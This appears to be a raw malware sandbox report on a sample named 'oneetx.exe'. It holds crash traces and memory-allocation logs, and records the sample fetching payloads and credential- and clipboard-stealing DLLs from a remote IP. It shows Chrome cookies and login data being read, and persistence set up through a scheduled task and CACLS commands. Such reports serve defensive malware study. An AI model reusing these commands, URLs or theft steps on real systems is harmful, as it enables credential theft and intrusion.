_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 24 30 ee 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb4f85e
registers.esp: 2025384
registers.edi: 2025608
registers.eax: 0
registers.ebp: 2025620
registers.edx: 15609524
registers.ebx: 2027484
registers.esi: 43129644
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4873128
0x4873997
0x4873458
0xb4ed15
0xb4dc10
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x487316b
registers.esp: 2025596
registers.edi: 2025908
registers.eax: 0
registers.ebp: 2025604
registers.edx: 0
registers.ebx: 2027484
registers.esi: 43129644
registers.ecx: 44801360
1 0 0

__exception__

stacktrace:
0x48735ac
0x4873458
0xb4ed2d
0xb4dc10
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 24 30 ee 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb4f85e
registers.esp: 2025384
registers.edi: 2025608
registers.eax: 0
registers.ebp: 2025620
registers.edx: 15609524
registers.ebx: 2027484
registers.esi: 43129644
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4873128
0x4873997
0x4873458
0xb4ed2d
0xb4dc10
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x487316b
registers.esp: 2025596
registers.edi: 2025908
registers.eax: 0
registers.ebp: 2025604
registers.edx: 0
registers.ebx: 2027484
registers.esi: 43129644
registers.ecx: 46150280
1 0 0

__exception__

stacktrace:
0x48735ac
0x4873458
0xb4ed2d
0xb4dc10
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 24 30 ee 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb4f85e
registers.esp: 2025384
registers.edi: 2025608
registers.eax: 0
registers.ebp: 2025620
registers.edx: 15609524
registers.ebx: 2027484
registers.esi: 43129644
registers.ecx: 0
1 0 0
suspicious_features: POST method with no referer header, POST method with no useragent header, Connection to IP address
suspicious_request: POST http://77.91.124.20/store/games/index.php
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://77.91.124.20/DSC01491/foto0174.exe
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://77.91.124.20/DSC01491/fotocr23.exe
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://77.91.124.20/store/games/Plugins/cred64.dll
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://77.91.124.20/store/games/Plugins/clip64.dll
request POST http://77.91.124.20/store/games/index.php
request GET http://77.91.124.20/DSC01491/foto0174.exe
request GET http://77.91.124.20/DSC01491/fotocr23.exe
request GET http://77.91.124.20/store/games/Plugins/cred64.dll
request GET http://77.91.124.20/store/games/Plugins/clip64.dll
request POST http://77.91.124.20/store/games/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73261000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73261000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72df1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00460000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72de2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 983040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02660000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d12000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x726bb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x726d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x726d2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 1048576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02880000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02661000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a5a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73271000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02663000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a6c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02664000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a8b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a87000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x715ea000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02640000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a85000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7325f000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 28672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02641000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a76000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a7a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a77000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02648000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02649000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0264a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0264d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73111000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d92000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2888
region_size: 1310720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b40000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2888
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72cc2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7266b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72681000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72682000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2888
region_size: 983040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b40000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
description oneetx.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 3252637
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3252637
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3252222
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3252222
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3251903
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3251903
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3249842
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3249842
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3249427
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3249427
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3249268
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3249268
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3248554
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3248554
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3248139
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3248139
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3247820
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3247820
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\d7677923.exe
file C:\Users\test22\AppData\Local\Temp\IXP007.TMP\k3172217.exe
file C:\Users\test22\AppData\Local\Temp\IXP005.TMP\y1696486.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\v3703114.exe
file C:\Users\test22\AppData\Local\Temp\IXP005.TMP\n8251784.exe
file C:\Users\test22\AppData\Local\Temp\1000020051\foto0174.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\i6821669.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\a9556928.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\v0482713.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\h4892724.exe
file C:\Users\test22\AppData\Local\Temp\IXP006.TMP\y5856029.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Local\Temp\1000021051\fotocr23.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\x6228514.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\x1404399.exe
file C:\Users\test22\AppData\Local\Temp\IXP006.TMP\m1118777.exe
file C:\Users\test22\AppData\Local\Temp\IXP004.TMP\f5626788.exe
file C:\Users\test22\AppData\Local\Temp\IXP007.TMP\l2919722.exe
file C:\Users\test22\AppData\Local\Temp\IXP004.TMP\g7297858.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\b0495250.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\c6805445.exe
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\c3912af058" /P "test22:N"&&CACLS "..\c3912af058" /P "test22:R" /E&&Exit
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe" /F
file C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe
file C:\Users\test22\AppData\Local\Temp\1000020051\foto0174.exe
file C:\Users\test22\AppData\Local\Temp\1000021051\fotocr23.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe
file C:\Users\test22\AppData\Local\Temp\1000021051\fotocr23.exe
file C:\Users\test22\AppData\Local\Temp\1000020051\foto0174.exe
